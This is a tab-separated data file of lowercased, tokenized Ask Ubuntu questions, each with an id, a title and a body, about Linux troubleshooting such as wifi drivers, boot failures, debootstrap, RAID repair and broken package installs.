237893	firefox sluggish , printing error message	i am using firefox via ssh on the following machine : g1 > head -1 /etc/motd welcome to ubuntu 12.04 lts ( gnu/linux 3.2.0-26-generic x86_64 ) g1 > firefox -version mozilla firefox 17.0.1 when called from an xterm , the following message appears repeatedly . it seems to be printed only when i perform some action , like writing this question . clicking on something . otherwise , no message is printed . ( firefox:4162 ) : gconf-warning ** : client failed to connect to the d-bus daemon : //bin/dbus-launch terminated abnormally without any error message while writing this question i received about a dozen such messages . is there some way to avoid this ( apart from 2 > /dev/null ) ? probably , the following is irrelevant , but who knows : g1 > uname -a linux g1 3.2.0-26-generic # 41-ubuntu smp thu jun 14 17:49:24 utc 2012 x86_64 x86_64 x86_64 gnu/linux
237894	ubuntu 12.04.1 lts `` checking battery state ... [ ok ] '' and login incorrect	i have quite a famous problem as it seems : while booting , the computer displays checking battery state ... [ ok ] and then hangs . * starting cups printing spooler/server mountall : plymouth copmmand failed mountall : disconnected from plymouth [ ... ] speech-dispatcher disabled ; edit /etc/default/speech-dispatcher jmx enable by default [ ... ] * starting ntp server ntpd [ ok ] saned disabled ; edit /etc/default/saned * checking battery state ... [ ok ] all the answers i could find mention pressing ctrl+alt+f1 and entering my credentials . but after doing so , i just get as an answer login incorrect and i 'm again prompted to enter my credentials . i am 200 % sure about my credentials , i have been working on this machine for over 3 weeks logging in and out around 10 times a day .
237896	problem with my acer d250 netbook and wifi adapter in lubuntu 12.10	hi i am having a problem after a clean installation of lubuntu 12.10 after the initial installation , my wifi adapter can not function and thus offer me wifi connnectivity . i downloaded all the updates but still nothing . i am using ubuntu after the 10.x version where i could locate the device manager and update everything needed . in 12.10 version , i can ; t find the device manager at all . to sum up let me tell you that all the above happened at exactly the same way during my ubuntu 12.10 installation some weeks ago . ( i decided to turn it into lubuntu for faster operation ) . thank you in advance
237903	ubuntu appeared on my computer after downloading applications , how can i switch back to windows ?	i 've downloaded ubuntu application on my computer ( windows ) to put it on a pen drive and install ubuntu on an other computer . then i 've installed ubuntu on this other computer and everything was all right with this one . but then i started the first computer and windows had disappeared , and instead the computer started ubuntu ! i did n't install ubuntu on this computer , i 've just downloaded the application . i want to access windows . what can i do ?
237909	download ubuntu for nokia e7	where i can download ubuntu for phones and how to install it ?
237924	screen resolution issues with nvidia gtx 550ti	i have had a fresh install of 12.04 , and 12.10 , and have the same issue in both . i have an nvidia gtx 550 ti , and after installing the latest driver ( 3.10 ) , the screen resolution is a bit off . i am connecting the monitor via hdmi , and when i try to adjust the resolution using x-server , it does n't seem to work . going through the display settings in system settings does n't work either . what am i doing wrong ? thanks
237926	d-link dge-530t not connecting	my onboard lan died the other day so i installed a new d-link dge-530t rev . c1 pci card and disabled the onboard lan in the bios . my computer detects the d-link card ( etho ) but will not connect to the network . if i delete the 70-persistent-net.rules file and any swap files and restart my computer it works fine . as soon as i reboot or hibernate my computer though it again will not connect . am i missing something or does ubuntu not support this card ? a quick response would be greatly appreciated . thanks . p.s . i am a ubuntu nube so a relatively detailed description of how to fix this would be great . thanks again .
237930	how to install legendofgrimrock-linux.sh	i participated in the humble bundle 7 and i have this .sh file that just opens to gedit what do i do with this . i would imagine i need to do something in terminal but i have no clue .
237931	should i use inetd or xinetd ?	i see openbsd-inetd is installed by default but there are quite a few mentions of xinetd in askubuntu . i have a custom service to install . inetd would provide all the features i need . should i be using inetd or xinetd to be most compatible with future updates ?
237934	overscan compensation issue	since upgrading to 12.10 i cant permanently fix overscan on my tv . using this code i can fix the overscan sudo nvidia-settings -- assign currentmetamode= '' dfp-1 : 1920x1080 { viewportout=1850x1045+40+20 , viewportin=1920x1080 } but on 12.04 i would simply add this command to startup apps and it would work fine but this does not seem to work on 12.10 . any suggestions ? ps i have to enter this code twice in terminal because the first time turns my desktop background black and hides all open windows , but new one will still show up .
237935	how can i print a webpage to a pdf in a single , *continuous* page ?	i have an ipython notebook that i would like to print without having the page breaks cut through my figures . any suggestions ? i tried the `` awesome screenshot '' extension for chromium , but it was buggy and ended up cutting out half of my page . any suggestions ?
237941	how to configure the clock date format to iso 8601 in unity ?	by default , the time in am/pm style is shown , i would like to have the same that ls gives : 2013-01-09 01:12 that is 24 hours and iso 8601 . how can i do this ? i am aware of the following question . maybe that question was too general to be answered : how do i change to iso 8601 date format ? i tried the following : i click on the actual clock-display and i get a calendar . in that calendar i read `` time & date settings.. '' - so i click on it : no effect . no nothing . i right-click on the clock-display but i get the same calendar like when left-clicking on it .
237942	how does copy-paste work with xterm ?	left-down-clicking in xterms starts the selection of something to be copy-pasted . double-left clicking selects a word . triple-left clicking selects a line . all this works under unity in 11.04 . however , there is no way to copy-paste that selection to another place : the right-click menu shows paste disabled , and middle-clicking to copy-paste does not work . so how can i copy a selection from an xterm into another place ? i am happy with any method to perform this . ( i am using the default-installation no special configuration so far ) edit : same problem with xedit
237948	difficulty mounting ubuntu 12.10 ( 64-bit ) on new hdd	to the gentle membership of the ubuntu linux forum : after my laptop passed away a few weeks ago , i made up my mind to build n open source system . so i put together a computer for this purpose . i have set the boot sequence to read the cd first , and downloaded the .iso image for ubuntu 12.10 ( 64-bit ) because , why not ? the cd loads , i choose a language , and i get to a menu . the choices are : try ubuntu without installing install ubuntu check disc for defects test memory boot from first hard disk 1-3 gives me a black screen with a blinking cursor . then the cursor stopps blinking and i have to do a hard boot , 4 runs a memory test as promised , and i do n't have any data saved on my hdd so i have n't tried 5 . i should add that the 500g hdd is new out of the box with nothing on it . i did format the big partition with ext4 and made a 2g swap file partition which i formatted as `` linux swap-file . '' i used gparted to do this . it was on the system rescue disc i got from sourceforge . i wish i could reach that menu , choose to install ubuntu , and have it actually happen . what am i forgetting ? sincerely , ~puil9 i have gone through the procedures you have mentioned and success is still eluding me . i ran winmd5sum to verify the iso file , and found that it was correct . unfortunately i still got black screens when choosing install or try without installing . then i attempted to install from usb . i changed the boot sequence , and wrote the image to the usb stick using linuxlive usb creator 2.8.18 , and of course verified checksum . no dice . black screen after install attempt as well as try with out installing . do i need to start taking the hardware apart now ? p.s . only thing i can think of that may be amiss is that the usb stick is formatted in fat 32 . again , i am attempting to install 64 bit 12.10 . i will reformat the stick in ext4 and try again while waiting your further advice . thanks for your help .
237950	how can i install nbconvert ?	i tried installing nbconvert via the instructions on their readme . the curl line and the pip install line worked flawlessly , but i ca n't decipher what is meant by : you will need to either put the source repository in your $ path or symlink the nbconvert.py script , as well as the css and js subdirectories to a directory in your $ path . any idea where pip installed the app ? what 's this business about $ path ?
237953	how to open nautilus without a desktop ?	i 'm using xmonad , and i would like to open a nautilus window to a certain directory , because i like the convenience of browsing inside an encrypted zip file without unzipping it , which nautilus allows . however , opening nautilus , even with a path argument starts a desktop on the monitor i 'm using ( there are 8 xmonad monitors ) the desktop is inoperative and renders that monitor useless until nautilus is killed . is there any way to open just a nautilus window without any desktop starting ?
237955	can no longer log in after removing zeitgeist	i purged zeitgeist , but then got nervous and reinstalled it . even so , i can no longer log in to ubuntu . trying just brings me back to the log in screen . ( edit ) i solved the problem by logging in from the command line ( ctrl+alt+f1 ) and running sudo apt-get install ubuntu-desktop -- fix-missing
237957	is ubuntu phone 's gui going to be ported to desktop ubuntu ?	now that even cheap laptops are coming with touchscreens i was wondering if canonical plans to include its new touch version of unity gui on regular ubuntu for use in laptops and desktops .
237961	more keycode events being stolen in 12.04	i managed to fix problems with keys being stolen on 10.10 by disabling a bunch of bindings in compiz ( see which program is stealing my keyboard events ? ) , but i just upgraded to 12.04 and encountered a similar problem with meta-p ( or super-p or mod4-p or whatever alias is currently in vogue for this combination ) . i 'm not using unity , and i 've disabled every key binding that i can find in both compiz and the keyboard configuration tool available from system settings , but meta-p will still not come through and it is driving me crazy . here is the output from xev : keypress event , serial 36 , synthetic no , window 0x4000001 , root 0x15a , subw 0x0 , time 3301442 , ( 44,140 ) , root : ( 1757,192 ) , state 0x0 , keycode 133 ( keysym 0xffe7 , meta_l ) , same_screen yes , xlookupstring gives 0 bytes : xmblookupstring gives 0 bytes : xfilterevent returns : false focusout event , serial 36 , synthetic no , window 0x4000001 , mode notifygrab , detail notifyancestor focusout event , serial 36 , synthetic no , window 0x4000001 , mode notifyungrab , detail notifypointer focusin event , serial 36 , synthetic no , window 0x4000001 , mode notifyungrab , detail notifyancestor keymapnotify event , serial 36 , synthetic no , window 0x0 , keys : 90 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 my interpretation of this is that window 0x0 ( is this the window manager ? ) is grabbing this key combination but i have no idea why . i 've spent a lot of time trying to get this setup configured and would hate to have to switch window managers at this point , but stealing this key is just not acceptable , period . does anybody have any idea what is going on here ?
237963	how do i rotate my display when not using an x server ?	i have a widescreen monitor that rotates . i 'm trying to use it in 'landscape ' mode ( vertical ) . this is easy in the gui . how do i rotate my display when i am not running an x server or when i am viewing a virtual console / terminal .
237965	no cd rom . no installation ?	i do not have a cd rom on my netbook . it is an aspire one and i can not install ubuntu due to be not having a cd rom . can i use usb ports ? and how to i make a `` live '' usb drive ?
237966	is it possible to activate irq routing at runtime if it is disabled at boot ?	i 've had some kind of hardware failure on a laptop that requires me to boot with the kernel parameter acpi=noirq . this turns of my wifi . no good . is there a way to turn it back on after boot ? i tried a bunch of the other irq related options ( including disabling all of the ports but one , and then another one ) , and noirq seems to be the only parameter i can use to boot ( besides acpi=off ) . i 'm trying to figure out which piece of a hardware has failed so i can replace it , but i 'm not sure how .
237967	how can i use windows after installing ubuntu in windows ?	i recently installed ubuntu . i did n't install it from a disk , i downloaded it directly from the site and installed from windows . is there a way to maybe switch back to windows now ? i want to in order to use itunes and sync my iphone .
237970	i ca n't install ubuntu from my external hard drive	i have no clue what 's going on here . i installed the .iso via the universal usb installer on my external hard drive , but when i restarted and chose to boot up from the drive it told me some files were missing . i 'm doing this because i do n't have a blank dvd at my disposal and want to install it this way . can it even be done this way ?
237972	using a byobu and disconnected session how to see message on screen	i use byobu on sh and was doing some program which was left over for at least 24 hours , i had disconnected from the machine and logged in back after 24 hours is there a way i could see the messages which were on screen in this case.i am using ubuntu 11.10
237973	boots up in terminal and startx ca n't be found	ubuntu 12.04 newest kernel 3.7.1 ok , i downloaded `` eclipse '' in order to do some programming . then i wanted to reinstall it so i `` sudo apt-get -- purge remove [ ecplise ] `` . then i restarted my computer ( asus ux31a ) and it loads the nice purple startup screen and then goes straight to the command -line and asks for login and password . i tried for about an hour to mess around with it based off of other similar problems people had . i tried ... ctrl-f7 ( f8 ) -- nothing startx -- and got the error etc/x11/xinit/xserverrc : 3 : exec : usr/bin/x : not found then when i try to sudo shutdown now i get could not write bytes : broken pipe i 'm trying to trouble shoot this i could just reinstall ubuntu but i 'd rather fix the error if possible .
237978	debootstrap wants to remove target folder , why ?	i have in the past used debootstrap to bootstrap both debian and ubuntu systems . but this time , trying to bootstrap a ubuntu system from a debian 6 rescue system ( note : i have no choice about the rescue system , so please do n't suggest using ubuntu or such , it would n't be available to me ) . consider the following folder structure /target which i want to use to bootstrap the system : /dev/md0 on /target type ext4 ( rw , relatime , data=ordered ) /dev/md1 on /target/home type ext4 ( rw , relatime , data=ordered ) /dev/md2 on /target/var type ext4 ( rw , relatime , data=ordered ) now i am running the following debootstrap command : # lang=en_us.utf-8 debootstrap -- exclude=dhcp3-common , dhcp3-client , laptop-detect , tasksel , tasksel-data -- include=bash-completion , sudo , lshw , tmux , mercurial , etckeeper , unzip , mc , htop , pciutils , usbutils , openssh-server , localepurge , unattended-upgrades -- print-debs -- variant=minbase -- arch=amd64 precise /target i : retrieving inrelease i : failed to retrieve inrelease i : retrieving release w : can not check release signature ; keyring file not available /usr/share/keyrings/ubuntu-archive-keyring.gpg i : retrieving packages i : validating packages i : resolving dependencies of required packages ... i : resolving dependencies of base packages ... i : found additional base dependencies : apt-utils bzr gnupg gpgv libapt-inst1.4 libapt-pkg4.12 libbsd0 libedit2 libevent-2.0-5 libexpat1 libgssapi-krb5-2 libk5crypto3 libkeyutils1 libkrb5-3 libkrb5support0 libpci3 libreadline6 libsqlite3-0 libstdc++6 libusb-0.1-4 libusb-1.0-0 libwrap0 lsb-release mime-support openssh-client python python-apt python-apt-common python-bzrlib python-configobj python2.7 readline-common ubuntu-keyring ucf adduser base-files base-passwd bash bsdutils busybox-initramfs coreutils cpio dash debconf debianutils diffutils dpkg e2fslibs e2fsprogs findutils gcc-4.6-base grep gzip hostname ifupdown initramfs-tools initramfs-tools-bin initscripts insserv iproute klibc-utils libacl1 libattr1 libblkid1 libbz2-1.0 libc-bin libc6 libcomerr2 libdb5.1 libdbus-1-3 libdrm-intel1 libdrm-nouveau1a libdrm-radeon1 libdrm2 libelf1 libffi6 libgcc1 libglib2.0-0 libklibc liblzma5 libmount1 libncurses5 libncursesw5 libnih-dbus1 libnih1 libpam-modules libpam-modules-bin libpam-runtime libpam0g libpciaccess0 libpcre3 libplymouth2 libpng12-0 libselinux1 libslang2 libss2 libssl1.0.0 libtinfo5 libudev0 libuuid1 locales login lsb-base makedev mawk module-init-tools mount mountall multiarch-support ncurses-base ncurses-bin passwd perl-base plymouth procps python-minimal python2.7-minimal sed sensible-utils sysv-rc sysvinit-utils tar tzdata udev upstart util-linux xz-utils zlib1g apt apt-utils bash-completion bzr etckeeper gnupg gpgv htop libapt-inst1.4 libapt-pkg4.12 libbsd0 libedit2 libevent-2.0-5 libexpat1 libgssapi-krb5-2 libk5crypto3 libkeyutils1 libkrb5-3 libkrb5support0 libpci3 libreadline6 libsqlite3-0 libstdc++6 libusb-0.1-4 libusb-1.0-0 libwrap0 localepurge lsb-release lshw mc mercurial mime-support openssh-client openssh-server pciutils python python-apt python-apt-common python-bzrlib python-configobj python2.7 readline-common sudo tmux ubuntu-keyring ucf unattended-upgrades unzip usbutils i : deleting target directory rm : can not remove `/target/var ' : device or resource busy rm : can not remove `/target/home ' : device or resource busy i am running this as root , but the last three lines throw me off . if i try the same but without /target/var and /target/home , the last lines change to : i : deleting target directory rm : can not remove `/target ' : device or resource busy i am using : # debootstrap -- version debootstrap 1.0.42ubuntu0.1 from here and i installed it via dpkg -i debootstrap_1.0.42ubuntu0.1_all.deb which claimed to be successful . i have also attempted to install the variant buildd instead of the minbase one . same result . what is going on here ? why does debootstrap attempt to remove the target folder ? note : i also checked the man page , but can not find an option to prevent this attempted removal . also note : installing the keyring for the ubuntu archive does n't change a thing . i used wget -o /usr/share/keyrings/ubuntu-archive-keyring.gpg http : //archive.ubuntu.com/ubuntu/project/ubuntu-archive-keyring.gpg for it .
237979	fixing broken raid0 with dmraid ?	a while ago when i was still on windows i had two secondary 1 tb hard drives that used a raid0 setup , fakeraid i believe with intel . my primary hard drive died which seemed to have messed up the raid as well . using dmraid i get the error : `` isw : wrong number of devices in raid set '' when trying to use most commands . when trying to rebuild , `` rebuild : raid0 can not be rebuild '' . info when using dmraid -s : error : isw : wrong number of devices in raid set `` isw_bcibgbaaec_comp '' [ 1/2 ] on /dev/sdc *** group superset isw_bcibgbaaec -- > subset name : isw_bcibgbaaec_comp size : 1953519872 stride : 256 type : stripe status : broken subsets : 0 devs : 1 spares : 0 the info for fdisk -l on these two drives : disk /dev/sdc : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x6e697373 disk /dev/sdd : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 i can see that the disk identifier of the 2nd drive is showing 0x00000000 , which i assume it an issue . no files also under /dev/mapper aside from control . other things to mention when using disk utility , the first drive shows `` unknown scheme '' under partioning while the second drive shows `` not partitioned '' . the unknown scheme drive still shows many data blocks with labels `` free 112 gb '' , `` 871 gb raid component '' , `` 372 gb raid '' , `` free 257 gb '' , `` free 18446743 tb '' . have no idea why it shows so many free space labels as well as 18446743 terabytes ? wow . the not partitioned drive just says `` 1.0 tb raid component '' . does anyone happen to know what could be wrong ? am i able to fix the broken raid ? when i boot up the pc it actually says `` normal '' for the raid status so i was hoping it could be fixed . if you have any suggestions for what i should try or if you need any additional information , please let me know . thanks .
237981	what is the password to access juju web ui demo ?	a demo of juju web ui is available at http : //uistage.jujucharms.com:8080/ however , it asks for a password that is not mentioned in the blog or the development project of the ui . i found the link to the demo in the following blog post : http : //www.jorgecastro.org/2012/10/16/announcing-the-juju-web-ui/ many thanks adnene
237982	how to force a proprietary driver to load on startup ( revisited )	i have the exact same problem as how to force a proprietary driver to load on startup ? but the solution does not work for me . i have ~ $ tail -7 /etc/modprobe.d/blacklist.conf install rtl8192cu /bin/false install rtl8192c_common /bin/false install rtlwifi /bin/false blacklist rtl8192cu blacklist rtl8192c_common blacklist rtlwifi and ~ $ tail /etc/modules # /etc/modules : kernel modules to load at boot time . # # this file contains the names of kernel modules that should be loaded # at boot time , one per line . lines beginning with `` # '' are ignored . lp rtc 8192cu but my device ~ $ lsusb | grep d- bus 002 device 003 : id 2001:3308 d-link corp. keeps on using the kernel 's default driver : ~ $ sudo lshw -c network | tail -7 description : wireless interface physical id : 1 bus info : usb @ 2:5 logical name : wlan1 serial : 84 : c9 : b2:75 : a1:28 capabilities : ethernet physical wireless configuration : broadcast=yes driver=rtl8192cu ip=192.168.0.19 multicast=yes wireless=ieee 802.11bgn instead of the propriety driver : ~ $ lsmod | grep 8192 8192cu 547185 0 ~ $ modinfo 8192cu filename : /lib/modules/3.2.0-35-generic/kernel/drivers/net/wireless/8192cu.ko version : v3.4.4_4749.20121105 author : realtek semiconductor corp. description : realtek wireless lan driver license : gpl srcversion : 657e53e8fe213b566819c54 alias : usb : v0bdap8186d*dc*dsc*dp*ic*isc*ip* alias : usb : v0e66p0019d*dc*dsc*dp*ic*isc*ip* alias : usb : v0846p9021d*dc*dsc*dp*ic*isc*ip* alias : usb : v0b05p17abd*dc*dsc*dp*ic*isc*ip* alias : usb : v0df6p0061d*dc*dsc*dp*ic*isc*ip* alias : usb : v20f4p624dd*dc*dsc*dp*ic*isc*ip* alias : usb : v050dp2103d*dc*dsc*dp*ic*isc*ip* alias : usb : v050dp2102d*dc*dsc*dp*ic*isc*ip* alias : usb : v2001p3307d*dc*dsc*dp*ic*isc*ip* alias : usb : v4855p0091d*dc*dsc*dp*ic*isc*ip* alias : usb : v07aap0056d*dc*dsc*dp*ic*isc*ip* alias : usb : v07b8p8178d*dc*dsc*dp*ic*isc*ip* alias : usb : v2019pab2bd*dc*dsc*dp*ic*isc*ip* alias : usb : v7392p7822d*dc*dsc*dp*ic*isc*ip* alias : usb : v0586p341fd*dc*dsc*dp*ic*isc*ip* alias : usb : v2001p3309d*dc*dsc*dp*ic*isc*ip* alias : usb : v2001p330ad*dc*dsc*dp*ic*isc*ip* alias : usb : v2001p3307d*dc*dsc*dp*ic*isc*ip* alias : usb : v2019p1201d*dc*dsc*dp*ic*isc*ip* alias : usb : v04f2paffcd*dc*dsc*dp*ic*isc*ip* alias : usb : v04f2paffbd*dc*dsc*dp*ic*isc*ip* alias : usb : v04f2paff8d*dc*dsc*dp*ic*isc*ip* alias : usb : v04f2paffad*dc*dsc*dp*ic*isc*ip* alias : usb : v04f2paff9d*dc*dsc*dp*ic*isc*ip* alias : usb : v04f2paff7d*dc*dsc*dp*ic*isc*ip* alias : usb : v13d3p3358d*dc*dsc*dp*ic*isc*ip* alias : usb : v13d3p3359d*dc*dsc*dp*ic*isc*ip* alias : usb : v0bdap317fd*dc*dsc*dp*ic*isc*ip* alias : usb : v2019pab2ed*dc*dsc*dp*ic*isc*ip* alias : usb : v2019p4902d*dc*dsc*dp*ic*isc*ip* alias : usb : v4856p0091d*dc*dsc*dp*ic*isc*ip* alias : usb : v0bdap5088d*dc*dsc*dp*ic*isc*ip* alias : usb : v0df6p005cd*dc*dsc*dp*ic*isc*ip* alias : usb : v13d3p3357d*dc*dsc*dp*ic*isc*ip* alias : usb : v4855p0090d*dc*dsc*dp*ic*isc*ip* alias : usb : v20f4p648bd*dc*dsc*dp*ic*isc*ip* alias : usb : v2019pab2ad*dc*dsc*dp*ic*isc*ip* alias : usb : v050dp1102d*dc*dsc*dp*ic*isc*ip* alias : usb : v2001p3308d*dc*dsc*dp*ic*isc*ip* alias : usb : v103cp1629d*dc*dsc*dp*ic*isc*ip* alias : usb : v06f8pe033d*dc*dsc*dp*ic*isc*ip* alias : usb : v0eb0p9071d*dc*dsc*dp*ic*isc*ip* alias : usb : v07b8p8189d*dc*dsc*dp*ic*isc*ip* alias : usb : v7392p7811d*dc*dsc*dp*ic*isc*ip* alias : usb : v0df6p0052d*dc*dsc*dp*ic*isc*ip* alias : usb : v2019ped17d*dc*dsc*dp*ic*isc*ip* alias : usb : v0bdap817cd*dc*dsc*dp*ic*isc*ip* alias : usb : v0bdap8178d*dc*dsc*dp*ic*isc*ip* alias : usb : v0bdap8177d*dc*dsc*dp*ic*isc*ip* alias : usb : v0bdap018ad*dc*dsc*dp*ic*isc*ip* alias : usb : v0bdap818ad*dc*dsc*dp*ic*isc*ip* alias : usb : v0bdap817fd*dc*dsc*dp*ic*isc*ip* alias : usb : v0bdap8754d*dc*dsc*dp*ic*isc*ip* alias : usb : v0bdap817dd*dc*dsc*dp*ic*isc*ip* alias : usb : v0bdap817bd*dc*dsc*dp*ic*isc*ip* alias : usb : v0bdap817ad*dc*dsc*dp*ic*isc*ip* alias : usb : v0bdap817ed*dc*dsc*dp*ic*isc*ip* alias : usb : v0bdap8170d*dc*dsc*dp*ic*isc*ip* alias : usb : v0bdap8176d*dc*dsc*dp*ic*isc*ip* alias : usb : v0bdap8191d*dc*dsc*dp*ic*isc*ip* depends : vermagic : 3.2.0-35-generic smp mod_unload modversions parm : rtw_ips_mode : the default ips mode ( int ) parm : ifname : charp parm : rtw_initmac : charp parm : rtw_channel_plan : int parm : rtw_chip_version : int parm : rtw_rfintfs : int parm : rtw_lbkmode : int parm : rtw_network_mode : int parm : rtw_channel : int parm : rtw_mp_mode : int parm : rtw_wmm_enable : int parm : rtw_vrtl_carrier_sense : int parm : rtw_vcs_type : int parm : rtw_busy_thresh : int parm : rtw_ht_enable : int parm : rtw_cbw40_enable : int parm : rtw_ampdu_enable : int parm : rtw_rx_stbc : int parm : rtw_ampdu_amsdu : int parm : rtw_lowrate_two_xmit : int parm : rtw_rf_config : int parm : rtw_power_mgnt : int parm : rtw_low_power : int parm : rtw_wifi_spec : int parm : rtw_antdiv_cfg : int parm : rtw_enusbss : int parm : rtw_hwpdn_mode : int parm : rtw_hwpwrp_detect : int parm : rtw_max_roaming_times : the max roaming times to try ( uint ) parm : rtw_force_iol : force to enable iol ( bool ) parm : rtw_intel_class_mode : the intel class mode [ 0 : off , 1 : on ] ( uint ) parm : rtw_mc2u_disable : int even after reboot . edit i later realized that i blacklisted rtl8192c_common instead of rtl8192c-common . when doing a modinfo rtl8192cu one can see the dependencies : ~ $ modinfo rtl8192cu | grep dep depends : rtlwifi , mac80211 , rtl8192c-common these in turn : ~ $ modinfo rtlwifi | grep dep depends : mac80211 , cfg80211 ~ $ modinfo mac80211 | grep dep depends : cfg80211 ~ $ modinfo rtl8192c-common | grep dep depends : mac80211 ~ $ modinfo mac80211 | grep dep depends : cfg80211 ~ $ modinfo cfg80211 | grep dep depends : so in the mean time i have modified my blacklist.conf to look like : ~ $ tail -5 /etc/modprobe.d/blacklist.conf blacklist rtl8192cu blacklist rtl8192c-common blacklist rtlwifi blacklist mac80211 blacklist cfg80211 but it makes no difference /edit
237983	unsupported monitor resolution after upgrade from 10.04 lts to 12.04 lts	upgraded my server from ubuntu 10.04 lts to ubuntu 12.04 lts as per update manager suggestion . i was running 1920 x 1080 under 10.04 . now the video card is set outside the capabilities of the monitor . have no xorg.conf file . where can one find documentation of the boot process and files . do n't mind doing the research , but the forum seem to be a circular treadmill . computer specification : asus motherboard with an ati rage 128 video card driving a dell hd widescreen monitor .
237985	remove lxdm and start de via startx/startlxde	i want to remove lxdm and start lxde with just startx or startlxde . i previously just had an openbox installation and was building that up . i then installed lxde , but wanted to get rid of lxdm , so i uninstalled it . upon doing so , typing startx or startlxde kicks me into the previous openbox session and not into the lxde session . how do i fix this ?
237986	formatting hdd and usb-stick results in broken `` unknown '' file system	i am trying to format a new hard disk ( and a usb-stick ) using gparted . after successfully formatting the drive ( to ext2 , ext4 , ntfs , fat16 , whatever ) , gparted tries to reload the partition data and concludes that the partition type is `` unknown '' . i tried to use testdisk , which also seems to be confused about the state of the drive . it detected a 2gb partition to be 29gb big . rewriting boot table data , recreating the partition table and others have not worked . what is there left for me to try ?
237991	is there any software that can manage clocking in and out available for ubuntu ?	i am trying to encourage my boss to make the switch from an old card stamper to a computer running ubuntu . we need a decent program that employee 's can clock in during the day , clock out during lunch , and then back in . after the day is up we need it to give the exact hours/minutes the employee worked . if possible it would be nice if the app could sync with the computer in the office .
237998	will ubuntu 11.04 run on a 1.60 ghz atom 230 ?	i am new to ubuntu , currently i am working with windows xp on my system . i would like to install ubuntu 11.4 version software on my system . my system configuration is : intel ( r ) atom ( tm ) cpu 230 a 1.60 ghz system and 1 gb ram is this version working fine for this configuration , or i should go for another lower version of ubuntu ? if you have any alternative please tell me . does this version have built in audio and video drivers with vlc media player or should i install it separately ? we did n't have net specility . please give me some idea about these .
238002	is # ! /bin/sh read by the interpreter ?	in bash or sh , i guess anything which starts with # is a comment . but in bash scripts we write : # ! /bin/bash and in python scripts , there is : # ! /bin/python does this mean that # by itself is a comment whereas # ! is not ?
238003	in unity , how can i hide the global menu on an application running fullscreen in a second monitor ?	i often play video content on my second screen , and i 've noticed that when the fullscreen application loses focus ( i.e . i go back to doing something on my main screen ) a global menu bar appears above it . i find that distracting -- is there some way to prevent the menu bar from appearing in that context ?
238006	why does my 64-bit system look for 32-bit repos ?	i 've got a 64-bit 12.10 install on my laptop . when running apt-get update , it downloads package lists for 32-bit packages ( as well as source and 64-bit package lists ) . why does it look for 32-bit package lists on a 64-bit system ? i 've included one of the items it tries to find below . http : //us.archive.ubuntu.com/ubuntu/dists/quantal-backports/multiverse/binary-i386/packages
238011	apt-get install git-core failed	after running sudo apt-get install git-core , i get unpacking git-core ( from ... /git-core_1 % 3a1.7.4.1-3_all.deb ) ... errors were encountered while processing : /var/cache/apt/archives/git_1 % 3a1.7.4.1-3_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) so i followed the instructions from error installing git with apt-get but that did n't work either . i encountered this after running sudo dpkg -- remove -- force-remove-reinstreq git : dpkg : warning : overriding problem because -- force enabled : package is in a very bad inconsistent state - you should reinstall it before attempting a removal . ( reading database ... dpkg : warning : files list file for package `git ' missing , assuming package has no files currently installed . dpkg : warning : files list file for package `git-man ' missing , assuming package has no files currently installed . dpkg : warning : files list file for package `git-core ' missing , assuming package has no files currently installed . ( reading database ... 79719 files and directories currently installed . ) removing git ... at some point i was asked to run sudo apt-get -f install to fix things but it 's saying its going to install git the following extra packages will be installed : git suggested packages : git-doc git-el git-arch git-cvs git-svn git-email git-daemon-run git-gui gitk gitweb the following new packages will be installed : git 0 upgraded , 1 newly installed , 0 to remove and 480 not upgraded . 1 not fully installed or removed . need to get 4,658kb of archives . after this operation , 10.9mb of additional disk space will be used . and after clicking yes , the error occurs again : do you want to continue [ y/n ] ? y get:1 http : //ubuntu.mirror.cambrium.nl/ubuntu/ natty/main git 1:1.7.4.1-3 [ 4,658kb ] fetched 4,658kb in 5s ( 907kb/s ) selecting previously deselected package git . ( reading database ... dpkg : warning : files list file for package `git-man ' missing , assuming package has no files currently installed . dpkg : warning : files list file for package `git-core ' missing , assuming package has no files currently installed . ( reading database ... 79719 files and directories currently installed . ) unpacking git ( from ... /git_1 % 3a1.7.4.1-3_amd64.deb ) ... /var/lib/dpkg/tmp.ci/preinst : 12 : dpkg-maintscript-helper : not found dpkg : error processing /var/cache/apt/archives/git_1 % 3a1.7.4.1-3_amd64.deb ( -- unpack ) : subprocess new pre-installation script returned error exit status 127 /var/lib/dpkg/tmp.ci/postrm : 14 : dpkg-maintscript-helper : not found dpkg : error while cleaning up : subprocess new post-removal script returned error exit status 127 errors were encountered while processing : /var/cache/apt/archives/git_1 % 3a1.7.4.1-3_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) for some reasons , when i do dpgk -- get-selections | grep git , i get : git install git-core install git-man install so i 'm stuck in this cycle . how can i fix it ? on ubuntu 10.04.4 lts
238023	java not detected by banking site	my banking site does not find java plug-in even though java.com reports java working properly . iam using firefox and chrome on ubuntu 12.04 ( 64-bit ) . i have installed oracle java 7u10 ( 64-bit ) from webupd8 ppa . is this issue specific to the banking site ? how do i get it working ? however , when i access using ff/chrome/ie on windows xp , it works .
238027	pound symbol ( âł ) on us keyboard on 12.10	i need a shortcut to make a pound symbol with a us keyboard in 12.10 . the only way i can make one is by holding control-shift and typing u00a3 . too much typing for a single symbol ! i 'm using gnome classic .
